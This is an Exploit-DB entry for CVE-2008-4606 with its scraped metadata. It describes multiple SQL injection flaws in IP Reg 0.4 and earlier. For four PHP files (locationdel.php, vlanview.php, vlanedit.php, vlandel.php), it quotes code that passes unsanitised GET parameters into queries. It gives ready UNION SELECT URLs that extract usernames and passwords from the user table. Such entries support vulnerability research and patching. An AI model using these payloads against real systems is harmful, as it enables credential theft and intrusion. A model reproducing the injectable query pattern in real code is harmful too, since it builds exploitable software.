IP Reg <= 0.4 - Multiple Remote SQL Injection Vulnerabilities
2008-10-16T00:00:00
ID EDB-ID:6765 Type exploitdb Reporter JosS Modified 2008-10-16T00:00:00
Description
IP Reg <= 0.4 Multiple Remote SQL Injection Vulnerabilities. CVE-2008-4606. Webapps exploit for php platform
# IP Reg <= 0.4 Multiple Remote SQL Injection Vulnerabilities
# url: http://sourceforge.net/projects/ipreg/
#
# Author: JosS
# mail: sys-project[at]hotmail[dot]com
# site: http://spanish-hackers.com
# team: Spanish Hackers Team - [SHT]
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
#
# Greetz To: All Hackers and milw0rm website
-------------------------
vuln file: /locationdel.php
vuln code:
27: $location_id = $_GET['location_id'];
xx: ...
42: $result = mysql_query("SELECT location_name FROM location WHERE location_id='$location_id'") or die(mysql_error());
PoC: /locationdel.php?location_id='[foo]
Exploit: /locationdel.php?location_id='+union+all+select+concat(user_name,char(58),user_pass)+from+user/*
-------------------------
vuln file: /vlanview.php
vuln code:
27: $vlan_id = $_GET['vlan_id'];
xx: ...
42: $result = mysql_query("SELECT vlan_name, vlan_number, vlan_info FROM vlan WHERE vlan_id='$vlan_id'") or die(mysql_error
());
PoC: /vlanview.php?vlan_id='[foo]
Exploit: /vlanview.php?vlan_id='+union+all+select+1,1,concat(user_name,char(58),user_pass)+from+user/*
-------------------------
vuln file: /vlanedit.php
vuln code:
27: $vlan_id = $_GET['vlan_id'];
xx: ...
42: $result = mysql_query("SELECT vlan_name, vlan_number, vlan_info FROM vlan WHERE vlan_id='$vlan_id'") or die(mysql_error
());
PoC: /vlanedit.php?vlan_id='[foo]
Exploit: /vlanedit.php?vlan_id='+union+all+select+1,1,concat(user_name,char(58),user_pass)+from+user/*
-------------------------
vuln file: /vlandel.php
vuln code:
27: $vlan_id = $_GET['vlan_id'];
xx: ...
42: $result = mysql_query("SELECT vlan_id, vlan_name, vlan_number FROM vlan WHERE vlan_id='$vlan_id'") or die(mysql_error
());
PoC: /vlandel.php?vlan_id='[foo]
Exploit: /vlandel.php?vlan_id='+union+all+select+1,1,concat(user_name,char(58),user_pass)+from+user/*
# milw0rm.com [2008-10-16]
{"bulletinFamily": "exploit", "id": "EDB-ID:6765", "cvelist": ["CVE-2008-4606"], "modified": "2008-10-16T00:00:00", "lastseen": "2016-02-01T00:36:15", "edition": 1, "sourceData": "# IP Reg <= 0.4 Multiple Remote SQL Injection Vulnerabilities\n# url: http://sourceforge.net/projects/ipreg/\n#\n# Author: JosS\n# mail: sys-project[at]hotmail[dot]com\n# site: http://spanish-hackers.com\n# team: Spanish Hackers Team - [SHT]\n#\n# This was written for educational purpose. Use it at your own risk.\n# Author will be not responsible for any damage.\n#\n# Greetz To: All Hackers and milw0rm website\n\n-------------------------\n\nvuln file: /locationdel.php\nvuln code:\n27: $location_id = $_GET['location_id'];\nxx: ...\n42: $result = mysql_query(\"SELECT location_name FROM location WHERE location_id='$location_id'\") or die(mysql_error());\n\nPoC: /locationdel.php?location_id='[foo]\nExploit: /locationdel.php?location_id='+union+all+select+concat(user_name,char(58),user_pass)+from+user/*\n\n-------------------------\n\nvuln file: /vlanview.php\nvuln code:\n27: $vlan_id = $_GET['vlan_id'];\nxx: ...\n42: $result = mysql_query(\"SELECT vlan_name, vlan_number, vlan_info FROM vlan WHERE vlan_id='$vlan_id'\") or die(mysql_error\n ());\n\nPoC: /vlanview.php?vlan_id='[foo]\nExploit: /vlanview.php?vlan_id='+union+all+select+1,1,concat(user_name,char(58),user_pass)+from+user/*\n\n-------------------------\n\nvuln file: /vlanedit.php\nvuln code:\n27: $vlan_id = $_GET['vlan_id'];\nxx: ...\n42: $result = mysql_query(\"SELECT vlan_name, vlan_number, vlan_info FROM vlan WHERE vlan_id='$vlan_id'\") or die(mysql_error\n ());\n\nPoC: /vlanedit.php?vlan_id='[foo]\nExploit: /vlanedit.php?vlan_id='+union+all+select+1,1,concat(user_name,char(58),user_pass)+from+user/*\n\n-------------------------\n\nvuln file: /vlandel.php\nvuln code:\n27: $vlan_id = $_GET['vlan_id'];\nxx: ...\n42: $result = mysql_query(\"SELECT vlan_id, vlan_name, vlan_number FROM vlan WHERE vlan_id='$vlan_id'\") or die(mysql_error\n ());\n\nPoC: /vlandel.php?vlan_id='[foo]\nExploit: /vlandel.php?vlan_id='+union+all+select+1,1,concat(user_name,char(58),user_pass)+from+user/*\n\n# milw0rm.com [2008-10-16]\n", "published": "2008-10-16T00:00:00", "href": "https://www.exploit-db.com/exploits/6765/", "osvdbidlist": ["49232", "49231"], "reporter": "JosS", "hash": "fdbbf30aaa1bafae0f7b23c7e176b013607ee07bed66404d2df2971a4de5ec1a", "title": "IP Reg <= 0.4 - Multiple Remote SQL Injection Vulnerabilities", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "IP Reg <= 0.4 Multiple Remote SQL Injection Vulnerabilities. CVE-2008-4606. Webapps exploit for php platform", "references": [], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/6765/", "enchantments": {"vulnersScore": 7.5}}
{"result": {"cve": [{"id": "CVE-2008-4606", "type": "cve", "title": "CVE-2008-4606", "description": "Multiple SQL injection vulnerabilities in IP Reg 0.4 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) location_id parameter to locationdel.php and (2) vlan_id parameter to vlanedit.php. NOTE: the vlanview.php and vlandel.php vectors are already covered by CVE-2007-6579.", "published": "2008-10-17T20:18:53", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4606", "cvelist": ["CVE-2008-4606"], "lastseen": "2017-09-29T14:26:09"}]}}
